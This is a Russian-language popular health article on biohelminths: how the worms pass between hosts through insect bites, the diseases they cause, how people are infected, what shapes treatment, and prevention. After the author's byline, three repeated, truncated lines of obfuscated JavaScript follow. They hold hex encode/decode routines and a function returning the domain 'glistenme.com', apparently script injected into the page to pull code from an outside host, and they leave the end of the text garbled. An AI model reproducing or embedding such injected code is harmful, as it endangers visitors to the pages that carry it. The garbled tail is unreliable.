Что такое биогельминты?
Особенности паразитов
Основным хозяином биогельминтов могут быть млекопитающие либо человек. В зараженном организме гельминты достигают половой зрелости и становятся способными размножаться. Обитая в тканях, черви откладывают личинки. Они могут попадать в лимфу, кровь. Затем, при укусе кровососущих насекомых, которые и являются переносчиками биогельминтов, личинки проникают в их организм. Некоторое время они остаются в хоботке и при следующем укусе могут проникнуть в новый организм. И если это уже другой человек – происходит заражение. Если от одного укуса до другого проходит некоторое время и личинка остается в хоботке – она в это время развивается.
Важно:
Хотя в это трудно поверить, но личинки могут подстраиваться под те периоды, когда их переносчики являются наиболее активными. Они выходят в кровь именно в то время, чтобы иметь возможность проникнуть в его организм. К примеру, если переносчиками являются комары, то личинки проникают в кровь по утрам и вечерам.
Виды гельминтов биологического типа
Самые распространенные биогельминты являются причиной следующих заболеваний:
- Трематодоза всех видов.
- Трихиниллпеза.
- Филяриатоза.
- Эхинококкоза.
- Тениоза.
- Тениаринхоза.
- Дракункулеза.
- Дифиллоботриоза.
- Нематодоза и других.
Пути заражения
Заражение человека происходит при употреблении им в пищу:
- Мяса пораженных гельминтозом домашних животных.
- Рыбы, ракообразных.
- Растительной пищи.
- Воды.
Клиника и лечение заболевания
Клиническая картина и выбор медицинских препаратов для лечения зависят от многих факторов. Это:
- В каком состоянии находится иммунитет больного.
- Интенсивность инвазии.
- Локализации гельминтов.
- Вида паразита.
- Своевременное оказание медицинской помощи и ее качества.
Профилактические меры
Всегда болезнь легче предупредить, чем ее лечить. Это касается и гельминтозов. Чтобы биогельминты не смогли распространяться, увеличивая количество зараженных людей и животных, понадобиться предпринять некоторые меры:
- Своевременно лечить уже зараженных.
- Обрабатывать фекалии.
- Обеспечить должную санитарную проверку за качеством продуктов.
- Уничтожать переносчиков и обеспечивать надежную защиту от них.
- Правильно готовить пищу.
- Часто мыть руки и не только перед едой.
- Мыть овощи, фрукты.
Автор Валентина Мамчич
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "glistenme.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "glistenme.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "glistenme.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e